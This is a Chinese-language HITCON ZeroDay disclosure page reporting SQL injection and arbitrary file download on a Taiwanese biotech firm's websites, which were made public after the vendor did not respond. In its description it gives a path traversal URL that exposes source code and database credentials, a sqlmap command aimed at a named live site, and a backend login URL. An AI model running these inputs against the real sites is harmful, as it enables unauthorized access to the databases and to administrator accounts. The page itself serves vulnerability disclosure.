Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-01111
- Vendor: 太暘生物科技
- Title: 太暘生物科技 SQL注入與任意檔案下載
- Introduction: SQL注入與任意檔案下載
處理狀態
目前狀態
公開
Last Update : 2024/11/15
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2024/09/15 12:30:28 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/09/16 14:36:48 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/10/04 18:14:41 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/10/04 18:14:41 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/10/04 18:14:41 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/11/15 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-01111
- 通報者:nhd1261 ({{萌新}})
- 風險:高
- 類型:任意檔案下載 (Arbitrary File Download)
參考資料
攻擊者可經由該漏洞取得後端系統中的任意資料(包含主機之敏感檔案)。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.tweverlight.com.tw/download.php?file=
https://www.tcpsy.org.tw/newsInside.php?blogID=441
http://www.tweverlight.com.tw/backend/index.html
https://www.tcpsy.org.tw/newsInside.php?blogID=441
http://www.tweverlight.com.tw/backend/index.html
敘述
可以透過file指定路徑下載網頁原始碼,內有資料庫連接腳本,暴露資料庫帳密。
https://www.tweverlight.com.tw/download.php?file=../../download.php
發現網站具有SQL注入漏洞,注入後可獲得管理員帳號與SHA-1加密密碼。
Payload:
python sqlmap.py "https://www.tcpsy.org.tw/newsInside.php?blogID=441" --time-sec=10 --threads 10 --random-agent --dbs --batch
透過審計代碼發現後台登入介面。
http://www.tweverlight.com.tw/backend/index.html
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。